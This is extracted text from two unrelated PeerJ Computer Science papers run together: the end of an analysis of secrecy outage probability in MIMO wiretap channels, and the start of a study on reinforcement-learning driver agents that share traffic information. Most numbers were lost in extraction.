this figure shows the theoretical secrecy outage curves for the transmit-receive diversity system, comparing different numbers of antennas at the transmitter (mt), the legitimate receiver (mr), and the eavesdropper (me). full-size doi: . /peerjcs. /fig- the reason is that for the same product of mt and mr, an increase in mt+mr yields a performance enhancement (dighe, mallik & jamuar, ). figure depicts the theoretical secrecy outage probability of the aforementioned system for different combinations of mt, mr, and me. we observe that when (mt,mr) is kept fixed (i.e., at ( , ), ( , ), or ( , )), the larger me is, the smaller the array gain (as discussed in eq. ( )), which worsens the secrecy outage performance. furthermore, it can be seen that for a given γ̄r, the secrecy outage probability with (mt,mr,me)=( , , ) is higher than that with (mt,mr,me)=( , , ). meanwhile, the secrecy outage probability with (mt,mr,me)= ( , , ) is higher than that with (mt,mr,me)= ( , , ). the same performance trend occurs when (mt,mr,me) increases from ( , , ) to ( , , ) or from ( , , ) to ( , , ). these results reveal that adding mt and mr proportionally to me is advantageous. figure verifies the asymptotic secrecy outage probability of the transmit-receive diversity system derived in eqs. ( )–( ) at a fixed γ̄e (i.e., γ̄e = db). the exact and asymptotic secrecy outage curves are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. 
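as a rough illustration of the monte carlo procedure mentioned above (a sketch in python, not the author's actual matlab code), the snippet below estimates the secrecy outage probability of the transmit-receive diversity system by drawing rayleigh channel realizations, forming γr = γ̄r·lmax{hr hr†} and γe = γ̄e·‖he wt‖² as in eqs. (4) and (7), and counting how often the secrecy capacity falls below the target rate; all parameter values and the trial count are assumptions.

```python
import numpy as np

def secrecy_outage_tr(mt, mr, me, snr_r_db, snr_e_db, rate, trials=50_000, seed=1):
    """monte carlo estimate of the secrecy outage probability (transmit-receive diversity)."""
    rng = np.random.default_rng(seed)
    snr_r, snr_e = 10 ** (snr_r_db / 10), 10 ** (snr_e_db / 10)
    outages = 0
    for _ in range(trials):
        hr = (rng.standard_normal((mr, mt)) + 1j * rng.standard_normal((mr, mt))) / np.sqrt(2)
        he = (rng.standard_normal((me, mt)) + 1j * rng.standard_normal((me, mt))) / np.sqrt(2)
        # maximum-snr beamforming and combining (eqs. (2)-(4))
        eigvals, eigvecs = np.linalg.eigh(hr @ hr.conj().T)
        zr = eigvecs[:, -1]
        wt = hr.conj().T @ zr
        wt /= np.linalg.norm(wt)
        gamma_r = snr_r * eigvals[-1]
        gamma_e = snr_e * np.linalg.norm(he @ wt) ** 2            # eq. (7)
        cs = max(np.log2(1 + gamma_r) - np.log2(1 + gamma_e), 0)  # eq. (1)
        outages += cs < rate
    return outages / trials

# assumed setup: mt = mr = me = 2, eavesdropper snr 0 db, target rate 1 bit/s/hz
print(secrecy_outage_tr(2, 2, 2, snr_r_db=10, snr_e_db=0, rate=1))
```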
as γ̄r grows, the asymptotic curves approach the exact ones for different values of mt, mr, and me. it can also be observed that the secrecy diversity gain is mtmr, as predicted by eq. ( ), and the secrecy array gain diminishes with increasing me, as predicted by eq. ( ). figure compares the theoretical secrecy outage results for the spatial multiplexing systems with zf equalization (computed with eq. ( )) and mmse equalization (computed with eq. ( )), and their simulation counterparts. the theoretical and simulation results maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − − − − s ec re cy ou ta ge pr ob ab ili ty average snr at the receiver (db) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) figure comparison of exact and asymptotic secrecy outage probability of transmit-receive diversity system. this figure shows the exact and asymptotic secrecy outage curves for the transmit-receive diversity system with different numbers of antennas at the transmitter (mt), the legitimate receiver (mr), and the eavesdropper (me). the exact and asymptotic results are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. full-size doi: . /peerjcs. /fig- − − − − − − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty zf, m t = , m r = , m e = zf, m t = , m r = , m e = (simu.) mmse, m t = , m r = , m e = mmse, m t = , m r = , m e = (simu.) zf, m t = , m r = , m e = zf, m t = , m r = , m e = (simu.) mmse, m t = , m r = , m e = mmse, m t = , m r = , m e = (simu.) zf, m t = , m r = , m e = zf, m t = , m r = , m e = (simu.) mmse, m t = , m r = , m e = mmse, m t = , m r = , m e = (simu.) figure secrecy outage probability of spatial multiplexing systems with zf equalization (pout,zf) and mmse equalization (pout,mmse). this figure shows the theoretical and simulated secrecy outage curves for the zf equalization-based and mmse equalization-based spatial multiplexing systems with different num- bers of antennas at the legitimate receiver (mr) and fixed numbers of antennas at the transmitter (mt) and the eavesdropper (me). the simulation results are labeled with ‘‘simu.’’. full-size doi: . /peerjcs. /fig- maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. for a detailed analysis of the number of flops required for matrix–vector operations such as associated summations and multiplications, readers are referred to hunger ( ). − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty zf, m t = , m r = , m e = , γ e = db mmse, m t = , m r = , m e = , γ e = db zf, m t = , m r = , m e = , γ e = db mmse, m t = , m r = , m e = , γ e = db zf, m t = , m r = , m e = , γ e = db mmse, m t = , m r = , m e = , γ e = db zf, m t = , m r = , m e = , γ e = db mmse, m t = , m r = , m e = , γ e = db figure pout,zf versus pout,mmse for various me at fixed mt and mr (mt = mr = ). 
this figure shows the theoretical secrecy outage curves for the zf equalization-based and mmse equalization-based spatial mul- tiplexing systems with different numbers of antennas and average snrs at the eavesdropper (me and γ̄e), and fixed numbers of antennas at the transmitter (mt) and the legitimate receiver (mr). full-size doi: . /peerjcs. /fig- agree well, and both kinds of systems exhibit similar secrecy outage performance. indeed, the spatial multiplexing system with mmse equalization achieves lower secrecy outage probability when the number of antennas at the eavesdropper is more than that at the receiver, as illustrated in fig. . in addition, most noteworthy in eq. ( ) is the fact that, when the values of (mr−mt) and (me−mt) are fixed, the secrecy outage probability of the spatial multiplexing system with zf equalization remains the same regardless of the value of mt that is used. this fact is confirmed by fig. , where we plot the simulated secrecy outage curves in the case of mr−mt= ,me−mt= and that of mr−mt= ,me−mt= . figures and verify the asymptotic secrecy outage probability of the spatial multiplexing system with zf equalization derived in eqs. ( )–( ) and that of the spatial multiplexing system with mmse equalization derived in eqs. ( )–( ), respectively, at a fixed γ̄e (i.e., γ̄e = db). as γ̄r increases, the asymptotic curves tend towards the exact ones for different values of mt, mr, and me. it can also be noticed that the secrecy diversity gains of the two systems are mr−mt+ , as predicted by eqs. ( ) and ( ), and the corresponding secrecy array gains lessen with growing me, as predicted by eqs. ( ) and ( ). finally, it is interesting to compare the computational complexity of all three systems. to this end, we express such complexity in terms of the number of floating-point operations (flops), and the relevant calculations are summarized as follows: ( ) the number of flops maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = figure examples of pout,zf with mt = mr = me and that with mr = mt + and me = mt + . this figure shows the simulated secrecy outage curves for the zf equalization-based spatial multiplexing system in the case that the numbers of antennas at the transmitter (mt), the legitimate receiver (mr), and the eavesdrop- per (me) are the same, and the case of mr =mt+ , me =mt+ . full-size doi: . /peerjcs. /fig- − − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) figure comparison of exact and asymptotic secrecy outage probability of spatial multiplexing sys- tem with zf equalization. this figure shows the exact and asymptotic secrecy outage curves for the zf equalization-based spatial multiplexing system with different numbers of antennas at the legitimate re- ceiver (mr) and the eavesdropper (me), and a fixed number of antennas at the transmitter (mt). the exact and asymptotic results are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. full-size doi: . /peerjcs. 
/fig- maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. in practice, the choice of n depends on the ratio between the magnitude of the second largest eigenvalue of hrh † r and that of the corresponding largest eigenvalue as it dictates the rate of convergence (see golub & van loan ( ), section . ) for more details). − − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) figure comparison of exact and asymptotic secrecy outage probability of spatial multiplexing sys- tem with mmse equalization. this figure shows the exact and asymptotic secrecy outage curves for the mmse equalization-based spatial multiplexing system with different numbers of antennas at the legiti- mate receiver (mr) and the eavesdropper (me), and a fixed number of antennas at the transmitter (mt). the exact and asymptotic results are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. full-size doi: . /peerjcs. /fig- required to compute zr (via power iteration (golub & van loan, , section . )), wt, and ze for the transmit-receive diversity system; ( ) the number of flops required to compute wr,zf and we,zf for the spatial multiplexing system with zf equalization; and ( ) the number of flops required to compute wr,mmse and we,mmse for the spatial multiplexing system with mmse equalization. the results are given in table , where n is the number of iterations used in the power iteration method. figure shows the system complexity as a function of mt for mt =mr =me and for mr =me = mt. from this figure, we see that the computational complexity of the spatial multiplexing system with zf equalization is comparable to that of the spatial multiplexing system with mmse equalization, while the transmit-receive diversity system has the highest computational complexity, even with n = . conclusion we have presented exact and asymptotic analysis of the secrecy outage probability of the transmit-receive diversity system and spatial multiplexing systems with zf equalization and mmse equalization in a rayleigh-fading mimo wiretap channel. this asymptotic analysis has shown that the transmit-receive diversity system achieves a secrecy diversity order of mtmr, whereas the two spatial multiplexing systems offer the same secrecy diversity order of mr−mt+ . interestingly, all of these secrecy diversity orders do not rely on me. maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table system complexity in terms of floating-point operations. this table shows the computational complexity of the transmit-receive diversity system and the spatial multiplexing systems with zf equaliza- tion and mmse equalization. 
system number of flops transmit-receive diversity mtm r + mtmr+ mtme+ mt +( n − )m r + nmr+ me spatial multiplexing with zf m t + mtmr+ mtme−mr−me+ spatial multiplexing with mmse m t + mtmr+ mtme−mr−me+ number of transmit antennas n u m b e r o f flo p s tr, m t =m r =m e , n= tr, m t =m r =m e , n= zf, m t =m r =m e mmse, m t =m r =m e tr, m r =m e = m t , n= tr, m r =m e = m t , n= zf, m r =m e = m t mmse, m r =m e = m t figure comparison of system complexity for mt = mr = me and for mr = me = mt. this figure shows the system complexity for the case that the numbers of antennas at the transmitter (mt), the legiti- mate receiver (mr), and the eavesdropper (me) are the same, and the case of mr =me = mt. full-size doi: . /peerjcs. /fig- numerical results based on both theoretical analysis and simulations have demonstrated how mt, mr, and me affect the secrecy performance of such mimo systems. additional information and declarations funding the author received no funding for this work. competing interests the author declares there are no competing interests. maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. author contributions • kiattisak maichalernnukul conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://github.com/secrecy /peerj. references bashar s, ding z, li gy. . on secrecy of codebook-based transmission beamforming under receiver limited feedback. ieee transactions on wireless communications ( ): – doi . /twc. . . . biglieri e, calderbank r, constantinides a, goldsmith a, paulraj aj, poor hv. . mimo wireless communications. new york: cambridge university press. bloch m, barros j, rodrigues mrd, mclaughlin sw. . wireless information- theoretic security. ieee transactions on information theory ( ): – doi . /tit. . . chen c-j, wang l-c. . performance analysis of scheduling in multiuser mimo sys- tems with zero-forcing receivers. ieee journal on selected areas in communications ( ): – doi . /jsac. . . csiszár i, körner j. . broadcast channels with confidential messages. ieee transac- tions on information theory ( ): – doi . /tit. . . dighe pa, mallik rk, jamuar ss. . analysis of transmit-receive diversity in rayleigh fading. ieee transactions on communications ( ): – doi . /tcomm. . . dong l, han z, petropulu ap, poor hv. . improving wireless physical layer security via cooperating relays. ieee transactions on signal processing ( ): – doi . /tsp. . . ferdinand ns, da costa db, latva-aho m. . physical layer security in mimo ostbc line-of-sight wiretap channels with arbitrary transmit/receive antenna correlation. ieee wireless communications letters ( ): – doi . /wcl. . . . foschini gj. . layered space-time architecture for wireless communication in a fading environment when using multi-element antennas. bell labs technical journal ( ): – doi . /bltj. . gallager rg. . principles of digital communication. new york: cambridge university press. goel s, negi r. . guaranteeing secrecy using artificial noise. ieee transactions on wireless communications ( ): – doi . /twc. . . maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://github.com/secrecy /peerj http://dx.doi.org/ . /twc. . . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /jsac. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tcomm. . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /wcl. . . http://dx.doi.org/ . /bltj. http://dx.doi.org/ . /twc. . http://dx.doi.org/ . /peerj-cs. golub gh, van loan cf. . matrix computations. baltimore: johns hopkins university press. gradshteyn is, ryzhik im. . table of integrals, series and products. new york: academic press. he f, man h, wang w. . maximal ratio diversity combining enhanced security. ieee communications letters ( ): – doi . /lcomm. . . . heath jr rw, lozano a. . foundation of mimo communication. new york: cambridge university press. hunger r. . floating point operations in matrix-vector calculus. technical report. department of electrical and computer engineering, munich: technical university of munich. jankiraman m. . space-time codes and mimo systems. boston: artech house. jiang y, li j, hager ww. . uniform channel decomposition for mimo communications. ieee transactions on signal processing ( ): – doi . /tsp. . . jiang y, varanasi mk, li j. . performance analysis of zf and mmse equalizers for mimo systems: an in-depth study of the high snr regime. ieee transactions on information theory ( ): – doi . /tit. . . kalman d. . the maximum and minimum of two numbers using the quadratic formula. college mathematics journal ( ): – doi . / . khisti a, wornell gw. . secure transmission with multiple antennas–part ii: the mimome wiretap channel. ieee transactions on information theory ( ): – doi . /tit. . . kumar kr, caire g, moustakas al. . asymptotic performance of linear receivers in mimo fading channels. ieee transactions on information theory ( ): – doi . /tit. . . leung-yan-cheong sk, hellman me. . the gaussian wire-tap channel. ieee transactions on information theory ( ): – doi . /tit. . . lin c-h, tsai s-h, lin y-p. . secure transmission using mimo precod- ing. ieee transactions on information forensics and security ( ): – doi . /tifs. . . maaref a, aïssa s. . closed-form expressions for the outage and ergodic shan- non capacity of mimo mrc systems. ieee transactions on communications ( ): – doi . /tcomm. . . maichalernnukul k. . secrecy capacity analysis of transmit-receive diversity systems. in: proceedings of the ieee statistical signal processing workshop. ieee: freiburg, piscataway, – doi . /ssp. . . mckay mr. . random matrix theory analysis of multiple antenna communication systems. phd dissertation, the university of sydney, australia. mukherjee a, swindlehurst al. . robust beamforming for security in mimo wiretap channels with imperfect csi. ieee transactions on signal processing ( ): – doi . /tsp. . . maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /lcomm. . . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . / http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tifs. . http://dx.doi.org/ . /tcomm. . http://dx.doi.org/ . /ssp. . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /peerj-cs. oggier f, hassibi b. . the secrecy capacity of the mimo wiretap channel. ieee transactions on information theory ( ): – doi . /tit. . . ordóñez lg, palomar dp, pagès-zamora a, fonollosa jr. . high-snr analytical performance of spatial multiplexing mimo systems with csi. ieee transactions on signal processing ( ): – doi . /tsp. . . 
palomar dp, lagunas ma. . joint transmit-receive space-time equalization in spatially correlated mimo channels: a beamforming approach. ieee journal on selected areas in communications ( ): – doi . /jsac. . . papoulis a, pillai su. . probability, random variables, and stochastic processes. new york: mcgraw-hill. poor hv, schaefer rf. . wireless physical layer security. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . schaefer rf, loyka s. . the secrecy capacity of compound gaussian mimo wiretap channels. ieee transactions on information theory ( ): – doi . /tit. . . seethaler d, artés h, hlawatsch f. . dynamic nulling-and-cancelling with near-ml performance. in: proceedings of the ieee international conference on acoustics, speech and signal processing. montreal, – . seethaler d, artés h, hlawatsch f. . detection techniques for mimo spatial multiplexing systems. elektrotechnik und informationstechnik ( ): – doi . /bf . smith pj. . exact performance analysis of optimum combining with multiple inter- ferers in flat rayleigh fading. ieee transactions on communications ( ): – . tse d, viswanath p. . fundamentals of wireless communications. cambridge: cambridge university press. wang h-m, wang c, ng dwk. . artificial noise assisted secure transmission under training and feedback. ieee transactions on signal processing ( ): – doi . /tsp. . . wang h-m, wang c, ng dwk, lee mh, xiao j. a. artificial noise assisted secure transmission for distributed antenna systems. ieee transactions on signal processing ( ): – doi . /tsp. . . wang h-m, zheng t-x, yuan j, towsley d, lee mh. b. physical layer secu- rity in heterogeneous cellular networks. ieee transactions on communications ( ): – doi . /tcomm. . . wyner ad. . the wire-tap channel. the bell system technical journal ( ): – doi . /j. - . .tb .x. yang n, yeoh pl, elkashlan m, schober r, collings ib. . transmit antenna selection for security enhancement in mimo wiretap channels. ieee transactions on communications ( ): – doi . /tcomm. . . . zou y, wang x, shen w. . physical-layer security with multiuser scheduling in cognitive radio networks. ieee transactions on communications ( ): – doi . /tcomm. . . . maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /jsac. . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /tcomm. . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /tcomm. . . http://dx.doi.org/ . /tcomm. . . http://dx.doi.org/ . /peerj-cs. sharing diverse information gets driver agents to learn faster: an application in en route trip building sharing diverse information gets driver agents to learn faster: an application in en route trip building guilherme dytz dos santos and ana l.c. bazzan computer science, ufrgs (universidade federal do rio grande do sul), porto alegre, rs, brazil abstract with the increase in the use of private transportation, developing more efficient ways to distribute routes in a traffic network has become more and more important. several attempts to address this issue have already been proposed, either by using a central authority to assign routes to the vehicles, or by means of a learning process where drivers select their best routes based on their previous experiences. 
the present work addresses a way to connect reinforcement learning to new technologies such as car-to-infrastructure communication in order to augment the drivers knowledge in an attempt to accelerate the learning process. our method was compared to both a classical, iterative approach, as well as to standard reinforcement learning without communication. results show that our method outperforms both of them. further, we have performed robustness tests, by allowing messages to be lost, and by reducing the storage capacity of the communication devices. we were able to show that our method is not only tolerant to information loss, but also points out to improved performance when not all agents get the same information. hence, we stress the fact that, before deploying communication in urban scenarios, it is necessary to take into consideration that the quality and diversity of information shared are key aspects. subjects agents and multi-agent systems keywords multiagent systems, reinforcement learning, route choice introduction with the covid- related pandemic, there has been several reports that the use of private transportation means (e.g., individual vehicles) is increasing as people try to avoid public transit as much as possible. this leads to even more congestion and hence makes the question of selecting a route to go from a to b more and more prominent. this is especially the case for commuters, who make a given trip nearly every day and, hence, have the opportunity to learn and/or adapt to the traffic patterns faced daily. to address the challenges posed by an ever increasing demand, transportation authorities and traffic experts try to distribute the flow among existing routes in order to minimize the overall travel time. often, this task involves some form of communication with the drivers. traditional approaches such as variable message panels or radio broadcast are now being replaced by directed (and potentially personalized) communication, via new kinds of communication devices. how to cite this article dos santos gd, bazzan alc. . sharing diverse information gets driver agents to learn faster: an application in en route trip building. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author ana l.c. bazzan, bazzan@inf.ufrgs.br academic editor josé manuel galán additional information and declarations can be found on page doi . /peerj-cs. copyright dos santos and bazzan distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:bazzan@�inf.�ufrgs.�br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ while the current pattern is that each individual driver selects a route based on his/her own experience, this is changing as new technologies allow all sorts of information exchange. examples of these technologies are not only based on broadcast (e.g., gps or cellphone information) but also a two-way communication channel, where drivers not only receive traffic information but also provide them. hence, currently, many traffic-related applications for cellphones deal with the idea of a central authority in charge of somehow assigning routes for drivers. examples are waze, google apps, etc. 
since their specific algorithms are not published, one can only guess that they try to find a feasible solution, given a set of constraints that they are able to infer from the current data they collect. what seems certain is that these platforms work in a centralized way, based on data they collect when their customers or users use their specific apps. also, they do not handle locally collected and processed data. this leads to them being ineffective when the penetration of their services is low as, for example, during the initial stages of the pandemics, when few drivers were using the system. a way to mitigate this could be to decentralize the processing of information, as proposed here, and passing it to drivers to make their route choices. our method has some resemblance with the notion of traffic assignment (see “background and related work”), since it is based on the fact that drivers collect experience by trying out several routes until they settle on those that lead to the least travel time. traffic assignment approaches work (and indeed were developed for this purpose) well for planning tasks, that is, how to plan a traffic network (or change an existing one) in order to minimize travel costs. however, route choice is not related to planning tasks but, rather, is an operational aspect, especially in commuting situations, where drivers repeatedly travel from the same origin to the same destination. besides, traffic assignment is a centralized approach, in which the drivers do not actively select routes. rather, routes are assigned to them. thus, it is important to investigate how drivers do select routes in their daily commuting tasks. multi-agent reinforcement learning (marl) can be used for such purpose, as it fits the task of letting agents decide, autonomously, how to select routes to go from a to b. this is realized by letting agents iteratively choose their least costly route based on their own learning experiences. such approach has been tried before, as described in the section on related works. in fact, it has been shown that reinforcement learning is a good technique to investigate route choice. however, the learning process can be inefficient, as for instance, it may take time, since the agents have to collect experiences by themselves. as this happens to be a very noisy environment, the signal an agent gets can be little discriminatory (e.g., due to the presence of other learning agents, an agent may get the same signal for very different actions, or, conversely, different signals for the same action). thus, our long term aim is to investigate forms of accelerating the learning process. one of these forms is by giving more information to the agents. there are only few works that consider new technologies to this experience, as for instance those tied to vehicular communication in general. in the present article, we extend a method that connects marl to new technologies such as car-to-infrastructure communication (c i). these were formulated with the goal dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of investigating how c i communication could act to augment the information drivers use in their learning processes associated with choices of routes. in such approach, whole routes are not imposed or recommended to drivers, but rather, these receive local information about the most updated state of the links that happen to be near their current location. 
this way, drivers can change their route on-the-fly (the so-called en route trip building). further, that approach assumes that the infrastructure is able to communicate with the vehicles, both collecting information about their most recent travel times (on given links), as well as providing them with information that was collected from other vehicles. however, another assumption is that messages are never lost, which is not realistic. thus, in the present article, we relax this assumption and admit loses of messages, as well as investigate the impact of them on the overall performance. as a result of such extension, we are able to confirm that the marl technique combined with a c i model can accelerate the learning process. moreover, our approach is tolerant to information loses. in short, the contribution of the present work is manifold. first, we employ marl to the task of learning how to go from a to b. second, we do this using a non trivial scenario (as it is the case in most of the literature), in which there are more than one origin-destination pair. third, we depart from most of the literature where the learning task considers that the driver agents already know a set of (pre-computed) routes to select among. rather, we let these agents build their trips en route. this in turn requires the use of a microscopic, agent-based approach, where agents can potentially use different pieces of information in order to perform en route choice. this again contrasts to most of the literature, which uses macroscopic modeling (e.g., by means of abstract cost functions to compute travel times). fourth, we connect marl with the aforementioned communication technologies, in order to investigate whether the learning process can be accelerated by exchange of local information only. lastly, we extend a previous approach by investigating its robustness to loses of messages. this article is organized as follows. the “background and related work” briefly presents some background concepts on traffic assignment and reinforcement learning, as well as the panorama on the related work. following, our methods and experimental results are presented and discussed. we review the general conclusions and outline the future work in the last section. background and related work the traffic assignment problem in transportation, the traffic assignment problem (tap) refers to how to connect a supply (traffic infrastructure) to its demand, so that the travel time of vehicles driving within a network is reduced. this network can be seen as a graph g = (n, e), where n is the set of nodes that operate as junctions/intersections, and e is a set of directed links (or edges, as both terms are used interchangeably) that connect the nodes. hence the goal is then to assign vehicles to routes so that the travel time is minimized. for more details, the reader is referred to chapter in ortúzar & willumsen ( ). for our purposes it suffices to mention that classical approaches aim at planning tasks, are dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ centralized (i.e., trips are assigned by a central authority, not selected by individual drivers). also, the main approaches are based on iterative methods that seeks convergence to the user equilibrium (see “user equilibrium”). 
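as a small illustration of this graph view (nodes will later serve as states and outgoing edges as the actions available in a state), the network can be kept as a plain adjacency structure. the sketch below is a toy example in python; the node and edge names are invented for illustration and do not correspond to any of the networks used later.

```python
# toy directed road network g = (n, e): each intersection (node) maps to its
# outgoing links, given as (edge_id, destination_node). purely illustrative,
# much smaller than the grid network used in the experiments reported later.
network = {
    "a1": [("a1_a2", "a2"), ("a1_b1", "b1")],
    "a2": [("a2_a1", "a1"), ("a2_b2", "b2")],
    "b1": [("b1_a1", "a1"), ("b1_b2", "b2")],
    "b2": [("b2_b1", "b1"), ("b2_a2", "a2")],
}

# in the route-choice formulation used later, a node is a state and the outgoing
# edges of that node are the actions available in it
actions_per_state = {node: [edge for edge, _ in edges]
                     for node, edges in network.items()}
```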
user equilibrium when it comes to reaching a solution to the tap, one can take into account two perspectives: one that considers the system as a whole, and one that considers each user's point of view. in the system perspective, the best solution refers to the system reaching the best average travel time possible; this is the so-called system optimum (so), or wardrop's second principle (wardrop, ). we stress that the so is a desirable property, but hardly achievable, given that it comes at the cost of some users, who are not able to select a route leading to their personal best travel times. on the other hand, and most relevant for our current work, from the user's perspective, the system reaches the user (or nash) equilibrium (ue) when there is no advantage for any individual to change its route in order to minimize its travel time, as stated in wardrop's first principle (wardrop, ). the ue can be achieved by means of reinforcement learning, as discussed next. reinforcement learning reinforcement learning (rl) is a machine learning method whose main objective is to make agents learn a policy, that is, how to map a given state to a given action, by means of a value function. rl can be modeled as a markov decision process (mdp), where there is a set of states s, a set of actions a, a reward function r : s × a → ℝ, and a probabilistic state transition function t(s, a, s′) → [0, 1], where s ∈ s is the state the agent is currently in, a ∈ a is the action the agent takes, and s′ ∈ s is the state the agent might end up in after taking action a in state s; thus the tuple (s, a, s′, r) states that an agent was in state s, took action a, ended up in state s′, and received a reward r. the key idea of rl is to find an optimal policy π*, which maps states to actions in a way that maximizes future reward. reinforcement learning methods fall within two main categories: model-based and model-free. while in model-based approaches the reward function and the state transition are known, in the model-free case the agents learn r and t by interacting with the environment. one method that is frequently used in many applications is q-learning (watkins & dayan, ), which is a model-free approach. in q-learning, the agent keeps a table of q-values that estimate how good it is to take an action a in state s; in other words, a q-value q(s, a) holds the maximum discounted value of starting in state s, taking action a, and following an optimal policy thereafter. in each learning episode, the agents update their q-values using eq. ( ), where α and γ are, respectively, the learning rate and the discount factor for future values. $q(s, a) \leftarrow q(s, a) + \alpha \big( r + \gamma \max_{a'} q(s', a') - q(s, a) \big)$ ( ) in an rl task, it is also important to define how the agent selects actions, while also exploring the environment. a common action selection strategy is the ε-greedy, in which
hence the environment is inherently non-stationary. in this case, convergence guarantees, as previously known from single agent reinforcement learning (e.g., watkins & dayan ( ) regarding q-learning), no longer hold. a further issue in multi-agent reinforcement learning is the fact that aligning the optimum of the system (from the perspective of a central authority) and the optimum of each agent in a multi-agent system is even more complicated when there is a high number of agents interacting. related work solving the tap is not a new problem; there have been several works that aim at solving it. in one front, there are have classical methods (see chapter in ortúzar & willumsen ( )), which, as aforementioned, mostly deal with planning tasks. further, the tap can also be solved by imposing tolls on drivers (sharon et al., ; buriol et al., ; tavares & bazzan, ). the latter specifically connects road pricing with rl. however, the focus is on learning which prices to charge. besides these two fronts, rl for route choice is turning popular. when we refer to rl methods to solve the tap, these usually fall into two categories: a traditional rl method, and a stateless one. contrarily to the traditional approach, in the stateless case, the agents actually have only one state that is associated with its origin-destination pair, and they choose which actions to take. actions here correspond to the selection of one among k pre-computed routes. works in this category are ramos & grunitzki ( ) (using a learning automata approach), and grunitzki & bazzan ( ) (using q-learning). in zhou et al. ( ) the authors used a learning automata approach combined with a congestion game to reach the ue. tumer, welch & agogino ( ) adds a reward shaping component (difference utilities) to q-learning, aiming at aligning the ue to a socially efficient solution. apart from the stateless formulation, in the traditional case, agents may found themselves in multiple states, which are normally the nodes (intersections) of the network. actions then correspond to the selection of one particular link (edge) that leaves that node. in bazzan & grunitzki ( ) this is used to allow agents to learn how to build routes. however, they use a macroscopic perspective by means of cost functions that compute the abstract travel time. in the present article, the actual travel time is computed by means of a microscopic simulator (details ahead). a microscopic approach is required to handle communication issues. as aforementioned, our approach also includes c i communication, as these kinds of new technologies may lead agents to benefit from sharing their experiences (in terms of dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ travel times), thus reducing the time needed to explore, as stated in tan ( ). the use of communication in transportation systems, as proposed in the present paper, has also been studied previously (grunitzki & bazzan, ; bazzan, fehler & klügl, ; koster et al., ; auld, verbas & stinson, ). however, these works handle communication at abstract levels, using macroscopic approaches. in some cases, the information is manipulated to bias the agents to reach an expected outcome. moreover, most of these works deal with vehicular communication (i.e., messages are shared among the vehicles), or are based on broadcast of messages by one or few entities. 
